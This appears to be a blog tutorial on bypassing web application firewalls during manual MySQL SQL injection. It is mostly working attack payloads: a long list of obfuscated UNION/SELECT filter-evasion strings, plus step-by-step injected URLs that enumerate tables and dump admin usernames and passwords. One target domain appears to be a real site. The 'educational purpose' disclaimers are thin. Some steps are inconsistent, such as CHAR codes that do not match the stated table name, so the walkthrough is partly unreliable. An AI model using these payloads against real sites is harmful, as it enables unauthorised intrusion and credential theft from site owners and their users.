NOTE: Hacking is a
illegal activity so don't try on anyone. this tutorial is Only for educational
purpose. If you want to use this tutorials for miscellaneous purpose please
stop reading.
WAF Bypass Manual SQL injection
http://www.targetsite.com/news.php?id=11
Add Single Quote (') at the End Of The URL .
http://www.targetsite.com/news.php?id=11'
And Get MYSQL Error.
Lets Balance Our Query for Further Injecting.
http://www.targetsite.com/news.php?id=11--
http://www.targetsite.com/news.php?id=11--+
http://www.targetsite.com/news.php?id=11-- -
http://www.targetsite.com/news.php?id=11%23
http://www.targetsite.com/news.php?id=11;
Here Is A Small Explanation on Balance and Comment in our Injection.
After Balancing Our Query. Next is Count Total Number Of Columns
http://www.targetsite.com/news.php?id=11 order by 1--+
No Error !
http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!
http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error !
http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error !
Unknown
column '6' in 'order clause'
Now Try To Find Our Vulnerable Columns.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
If Our Target site Is
Protected with WAF. WAF Will Block Our Query and Give Us
Mod_Security Error.
So Here some WAF Bypassing Methods.
• /*!%55NiOn*/
/*!%53eLEct*/
• %55nion(%53elect 1,2,3)--
-
• +union+distinct+select+
• +union+distinctROW+select+
• /**//*!12345UNION
SELECT*//**/
• /**//*!50000UNION
SELECT*//**/
• /**/UNION/**//*!50000SELECT*//**/
• /*!50000UniON SeLeCt*/
• union /*!50000%53elect*/
• +#uNiOn+#sEleCt
• +#1q%0AuNiOn
all#qa%0A#%0AsEleCt
• /*!%55NiOn*/ /*!%53eLEct*/
• /*!u%6eion*/
/*!se%6cect*/
• +un/**/ion+se/**/lect
• uni%0bon+se%0blect
• %2f**%2funion%2f**%2fselect
• union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
• REVERSE(noinu)+REVERSE(tceles)
• /*--*/union/*--*/select/*--*/
• union (/*!/**/ SeleCT */
1,2,3)
• /*!union*/+/*!select*/
• union+/*!select*/
• /**/union/**/select/**/
• /**/uNIon/**/sEleCt/**/
• /**//*!union*//**//*!select*//**/
• /*!uNIOn*/ /*!SelECt*/
• +union+distinct+select+
• +union+distinctROW+select+
Just
Change The Union Select With Following Bypass URLs.
Now Check The Vulnerable Columns. we Use ( - ) for Finding Vulnerable
columns.
We Can Also Check Vulnerable Columns with Other methods instead of
Just Using (-).
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union
Select 1,2,3,4,5--+
Using And False
http://www.targetsite.com/news.php?id=11 and false Union
Select 1,2,3,4,5--+
Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union
Select 1,2,3,4,5--+
Using null
http://www.targetsite.com/news.php?id=null Union Select
1,2,3,4,5--+
Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select
1,2,3,4,5--+
http://www.targetsite.com/news.php?id=-11 Union Select
1,2,3,4,5--+
We Will Get Our Vulnerable Columns Printed On The Page.3 is Our
Vulnerable Column.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+
We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5
from information_schema.tables where table_schema=database()--+
We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table
name of Admin.
then encode admin table name in MYSQL Char() to get The Columns in
the Admin
Table.Change
table_name to column_name,information_schema.tables to
information_schema.columns
and Table_schema to Table_name.And Replace Database()
with our MYSQL Char() admin value.
http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97,
100, 109, 105, 110)--+
we can see the Column Names on Page . like id,username,pass
to Get The Data From columns here is our final Query.
http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(username,0x3a,password),4,5 from admin--+
2nd Method WAF Bypass Manual SQL Injection
http://www.targetsite.co.in/news.php?id=189'
this section again ! now write
http://www.targetsite.co.in/news.php?id=189
order by 1--+-
the page remain same ?
http://www.targetsite.co.in/news.php?id=189'
order by 2--+-
same ?
continue this untill the error display on page !
http://www.targetsite.co.in/news.php?id=189'
order by 4--+-
same!
http://www.area96.it/news.php?nws=61'
order by 5--+-
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale
column now !
write
http://www.targetsite.co.in/news.php?id=-189 union select
1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall
and select is forbidden so it will denied the
command
so we have to trick it by using our brain
in database / * ! ` ~ (
) these kind of symbol are not supported !
so when we if we add an extra symbol with select
firewall will allow it ! so we can trick it !
http://www.targetsite.co.in/news.php?id=-189 union /*!select*/
1,2,3,4--
bypassed :P
now u can see 2 3 4 at the page as vuln columns
!
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns
!
now we will use these number to display username
and password of website admin panel
on the page !
now just change lil thing here !
choose any number from vulnerable column and
change it to "group_concat(table_name)"
like i do
http://www.targetsite.co.in/news.php?id=189union select 1,group_concat(table_name),3,4--+-
and after 6 add "from
Information_schema.tables"
like this
http://www.targetsite.co.in/news.php?id=189 union /*!select*/
1,group_concat(table_name),3,4 from Information_schema.tables--+-
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,group_concat/*!(table_name)*/,3,4 from
Information_schema/**/.tables--+-
function group_concat does not exist O_o
it seam like group_concat is not working so we
will use only concat now
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(table_name)*/,3,4 from
Information_schema/**/.tables--+-
bypassed
now instead of number 2 column it will show tables
name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is
located in the database of website
so we will use
database also to extract username and password !
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(table_name)*/,3,4 from
Information_schema/**/.tables--+-
just add 1 more line after
information_schema.tables
which is "where
table_schema=database()"
like this
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(table_name)*/,3,4 from
Information_schema/**/.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin
table !
change "(table_name)" to
"(column_name)"
"information_schema.tables" to
"information_schema.columns"
"table_schema" to
"table_name"
and "database()" to "login"
but it will not work because it will not accept
name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this
table name!
we will convert the word Login to decimal
numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal
and binary so we will type L o g i n in the
box ASCii convertor !
give space between every word of login because
website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105,
110)
just add "CHAR" and , after every 3
numbers !
now we will use this instead of login !
so it will be
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(column_name)*/,3,4 from
Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110,
108, 111, 103, 105,110)--+-
ops again 403
table_name is forbidden
bypass
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(column_name)*/,3,4 from
Information_schema/**/.columnswhere /*!table_name*/=CHAR(97, 100,
109, 105, 110, 108, 111, 103,105, 110)--+-
the page show the result
usnd pdgame
this mean these are the columns of table
adminlogin
now we will simply send the query to give us the
username and password on the page !
just change
"(column_name)" to
"(usnd,0x3a,pdgame)"
and after "from" remove all words and
add "adminlogin"
0x3a is converted form of : to get seprate
answer of username and password !
and it would be
http://www.targetsite.co.in/news.php?id=189
union /*!select*/1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
the page show this result
admin: admin123
mean
1st user is
username=admin
password=admin123
Legal Disclaimer : This
tutorial is completely for educational purpose only. For any misuse of this
tutorial by any means the author will not be held responsible.
If you have any queries Please comment my posts.
If you have any queries Please comment my posts.
0 Comments